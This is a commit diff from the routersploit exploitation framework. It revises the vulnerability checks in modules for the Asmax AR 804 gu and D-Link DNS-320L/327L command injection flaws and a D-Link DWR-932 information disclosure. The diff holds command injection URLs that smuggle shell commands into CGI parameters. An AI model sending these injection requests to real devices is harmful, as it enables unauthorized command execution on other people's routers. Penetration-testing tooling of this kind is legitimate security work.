Skip to content

R
routersploit
Commit 2ec62d3f by Marcin Bury
Options

Fixing false positives with expressions.

parent 45e74915
Showing with 19 additions and 7 deletions
routersploit/modules/exploits/asmax/ar_804_gu_rce.py
import string
from routersploit import ( from routersploit import (
exploits, exploits,
print_success, print_success,
...@@ -62,15 +64,17 @@ class Exploit(exploits.Exploit): ...@@ -62,15 +64,17 @@ class Exploit(exploits.Exploit):
@mute @mute
def check(self): def check(self):
mark = random_text(32) number = int(random_text(6, alph=string.digits))
cmd = "echo {}".format(mark) solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)) url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and mark in response.text: if response.status_code == 200 and str(solution) in response.text:
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
import re import re
import string
from routersploit import ( from routersploit import (
exploits, exploits,
...@@ -72,15 +73,17 @@ class Exploit(exploits.Exploit): ...@@ -72,15 +73,17 @@ class Exploit(exploits.Exploit):
@mute @mute
def check(self): def check(self):
mark = random_text(32) number = int(random_text(6, alph=string.digits))
cmd = "echo {}".format(mark) solution = number - 1
cmd = "echo $(({}-1))".format(number)
url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd)) url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and mark in response.text: if response.status_code == 200 and str(solution) in response.text:
return True # target is vulnerable return True # target is vulnerable
return False # target is not vulnerable return False # target is not vulnerable
routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
...@@ -68,7 +68,12 @@ class Exploit(exploits.Exploit): ...@@ -68,7 +68,12 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and 'wifi_AP1_ssid' in response.text: if response.status_code == 200:
try:
data = json.loads(response.text)
if len(data):
return True # target is vulnerable return True # target is vulnerable
except ValueError:
return False # target is not vulnerable
return False # target is not vulnerable return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment